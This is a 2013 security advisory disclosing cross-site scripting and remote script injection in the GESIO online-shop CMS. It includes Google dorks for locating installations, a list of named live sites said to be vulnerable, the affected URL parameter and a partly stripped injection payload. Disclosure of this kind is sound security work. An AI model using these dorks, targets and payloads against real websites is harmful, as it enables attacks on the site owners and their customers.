+=============================================================================================+ + Software Gestión GESIO & XSS & Allow Execute Evil Remote Code + +=============================================================================================+ Author(s): Ivan Sanchez & Raul Diaz Product: Software Gestión GESIO Web:http://www.gesio.com/ Versions: Modulo / Tienda Online - CM Date: 18/04/2013 Vendor Notified: 18/04 Vendor Notified again: 19/04 Extract: http://www.gesio.com/tienda-online-cms-89-50-431/ "Tu tienda Online conectada a tu facturación diaria. Facturarás con el mismo sistema que vendes online. En GESIO® pensamos que un sistema de gestión online debe tener la posibilidad de desarrollar Tienda Online" GOOGLE DORKS: ------------ allintext:POLÍTICA DE PROTECCIÓN DE DATOS -Software Gestión GESIO® inurl:cms/site_0003 Sites affected -------------------- ALL SITES USING THIS CM http://www.qualitycenter.es/lp/ http://www.greenhabit.es/lp/ http://www.latiendadelhormigonimpreso.com/lp/ http://www.minisub.es/lp/ http://www.vitalarchery.com/lp/ http://www.palacios-congresos-es.com/lcli/ http://www.aulasconsoftware.com/lp/ http://www.arthulencourt.eu/lp/ http://www.soltercam.com/lp/ http://www.sol-i-vent.es/lp/ http://www.ale-hop.org/lp/ http://creugal-hobby.com/lp/ http://www.xipnet.es/lp/ http://www.canterbury.es/lp/ http://ociostock.com/lp/ http://guatebloem.com/productos_listado.php much more.... Attacks >>>>>>>>>>>>>>>>>>> XSS & REMOTE INJECTION CODE: --------------------------- '">>

EvilCode Team

Or "> EXTERNAL EVIL CODE ! Parameter Affected: ------------------- --form 1 -- http://www.sites/comunicados_listado.php?filtro_texto= INJECT HERE and much more... Remediation: ------------ Could you please validate the input , sanitize each parameter. Thanks you so much! NULL CODE SERVICES [ www.evilcode.com.ar ] Hunting Security Bugs! +=============================================================================================+ + Software Gestión GESIO & XSS & Allow Execute Evil Remote Code + +=============================================================================================+